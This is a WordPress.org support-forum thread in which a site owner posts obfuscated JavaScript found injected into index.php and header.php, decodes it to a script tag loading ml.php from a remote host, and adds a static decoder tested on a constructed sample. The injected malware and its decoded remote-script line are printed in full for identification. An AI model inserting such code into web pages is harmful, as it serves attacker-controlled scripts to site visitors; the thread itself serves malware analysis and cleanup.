WordPress.org

php index and header malware id (2 posts)

  1. here
    Member
    Posted 3 years ago #

    Had a few sites hit with malware this past week, including one running 3.0.2. Wondering if anyone recognizes and can help me figure out what the mechanism of infection is.

    Seems to append just before the last characters of index.php and header.php files in most directories.

    Looks like this with random variable strings, differing with different infections.

    Thanks!

    <script type="text/javascript">var wGss98v0zDCHi = "uBdb915uBdb935";var qg2solLrupydN0 = "uBdb93cuBdb973uBdb963uBdb972u"; var qg2solLrupydN1 = "Bdb969uBdb970uBdb974uBdb920uB"; var qg2solLrupydN2 = "db974uBdb979uBdb970uBdb965uBd"; var qg2solLrupydN3 = "b93duBdb922uBdb974uBdb965uBdb"; var qg2solLrupydN4 = "978uBdb974uBdb92fuBdb96auBdb9"; var qg2solLrupydN5 = "61uBdb976uBdb961uBdb973uBdb96"; var qg2solLrupydN6 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN7 = "uBdb922uBdb920uBdb973uBdb972u"; var qg2solLrupydN8 = "Bdb963uBdb93duBdb922uBdb968uB"; var qg2solLrupydN9 = "db974uBdb974uBdb970uBdb93auBd"; var qg2solLrupydN10 = "b92fuBdb92fuBdb963uBdb96fuBdb"; var qg2solLrupydN11 = "975uBdb96euBdb974uBdb965uBdb9"; var qg2solLrupydN12 = "72uBdb973uBdb974uBdb961uBdb97"; var qg2solLrupydN13 = "4uBdb973uBdb92euBdb973uBdb965"; var qg2solLrupydN14 = "uBdb972uBdb976uBdb965uBdb96du"; var qg2solLrupydN15 = "Bdb970uBdb933uBdb92euBdb963uB"; var qg2solLrupydN16 = "db96fuBdb96duBdb92fuBdb92fuBd"; var qg2solLrupydN17 = "b96duBdb96cuBdb92euBdb970uBdb"; var qg2solLrupydN18 = "968uBdb970uBdb922uBdb93euBdb9"; var qg2solLrupydN19 = "20uBdb93cuBdb92fuBdb973uBdb96"; var qg2solLrupydN20 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN21 = "uBdb93e"; var ZPFlt1UYA1tfk = "Dh3Ln15uBdb935";var ERYCkoBwTvOcS = qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21; CtnqKOXMGM9bE = ERYCkoBwTvOcS.replace(/uBdb9/g,"%");var iRDgo28MEsBPo = unescape;var wGss98v0zDCHi = "AUx2i15Dh3Ln35";w9221 = this;var NKCGnIAa0Vzgr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE));</script></body></html>

  2. here
    Member
    Posted 3 years ago #

    This resolves to a document.write call attempting to append the following script.

    <script type="text/javascript" src="http://counterstats.servemp3.com//ml.php"> </script>
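
Added example, not part of either post above: a static decoder for the obfuscation scheme in the first post's snippet (string chunks joined, a junk token swapped for `%`, then `unescape`), which recovers the injected markup without running any of it. The sample input, its `Qz` token and the `a.invalid` host are constructed for illustration, and the function names are this example's own.

```javascript
// Added example: static decoder for the injected-script pattern in post 1.
// Nothing from the sample is evaluated; the text is only parsed.

// Constructed sample (not from the thread): same scheme, token "Qz" for "%".
const SAMPLE = [
  'var p0 = "Qz3cQz73Qz63Qz72Qz69Qz70Qz74Qz20Qz73Qz72Q";',
  'var p1 = "z63Qz3dQz22Qz2fQz2fQz61Qz2eQz69Qz6eQz76Qz6";',
  'var p2 = "1Qz6cQz69Qz64Qz2fQz62Qz2eQz6aQz73Qz22Qz3eQ";',
  'var p3 = "z3cQz2fQz73Qz63Qz72Qz69Qz70Qz74Qz3e";',
  'var all = p0+p1+p2+p3; out = all.replace(/Qz/g,"%");',
].join("\n");

// unescape()-compatible decoding of %XX and %uXXXX, done by hand.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

function decodeInjectedScript(source) {
  // 1. Collect every  var NAME = "literal"  assignment.
  const literals = new Map();
  for (const m of source.matchAll(/var\s+(\w+)\s*=\s*"([^"]*)"/g)) {
    literals.set(m[1], m[2]);
  }
  // 2. Find  X.replace(/TOKEN/g,"%") : TOKEN stands in for "%".
  const rep = source.match(/(\w+)\.replace\(\/(\w+)\/g,\s*"%"\)/);
  if (!rep) return null;
  const [, joinedVar, token] = rep;
  // 3. Find  var X = a+b+c;  and join the referenced literals in order.
  const concat = source.match(new RegExp(
    "var\\s+" + joinedVar + "\\s*=\\s*(\\w+(?:\\s*\\+\\s*\\w+)*)\\s*;"));
  if (!concat) return null;
  const names = concat[1].split("+").map((n) => n.trim());
  if (!names.every((n) => literals.has(n))) return null;
  const joined = names.map((n) => literals.get(n)).join("");
  // 4. Undo the token substitution, then percent-decode.
  const decoded = percentDecode(joined.split(token).join("%"));
  // 5. Extract script src values to use as search terms in logs.
  const urls = [...decoded.matchAll(/src\s*=\s*["']([^"']+)["']/gi)]
    .map((m) => m[1]);
  return { token, decoded, urls };
}

console.log(decodeInjectedScript(SAMPLE));
```

Run against the block cut from an infected index.php or header.php, the returned `urls` give the string to search for in web-server and proxy logs and in the remaining files.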

This topic has been closed to new replies.
